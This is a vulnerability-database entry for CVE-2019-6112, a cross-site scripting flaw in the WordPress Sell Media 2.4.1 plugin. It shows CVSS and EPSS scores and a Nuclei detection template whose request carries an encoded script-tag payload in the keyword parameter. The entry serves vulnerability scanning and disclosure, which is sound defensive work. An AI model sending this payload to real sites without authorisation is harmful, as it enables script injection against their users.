Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-6112
HistoryAug 16, 2020 - 3:22 p.m.

WordPress Sell Media 2.4.1 - Cross-Site Scripting

2020-08-1615:22:28
ProjectDiscovery
github.com
5

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

47.5%

WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).

id: CVE-2019-6112

info:
  name: WordPress Sell Media 2.4.1 - Cross-Site Scripting
  author: dwisiswant0
  severity: medium
  description: WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of WordPress Sell Media or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
    - https://nvd.nist.gov/vuln/detail/CVE-2019-6112
    - https://metamorfosec.com/Files/Advisories/METS-2020-001-A_XSS_Vulnerability_in_Sell_Media_Plugin_v2.4.1_for_WordPress.txt
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-6112
    cwe-id: CWE-79
    epss-score: 0.00126
    epss-percentile: 0.47188
    cpe: cpe:2.3:a:graphpaperpress:sell_media:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: graphpaperpress
    product: sell_media
    framework: wordpress
  tags: cve,cve2019,wordpress,wp-plugin,xss,graphpaperpress

http:
  - method: GET
    path:
      - "{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "id=\"sell-media-search-text\" class=\"sell-media-search-text\""
          - "alert(1337)"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100afb58d1b7cf580535dfd6f4e76129f3d692b093a0d7b3122f04e4b39bab5af1a0220305814c2f5ae5e13c834c0d4bb8c18ce2c35f5e9ad8d7dbed344f075fd675044:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

47.5%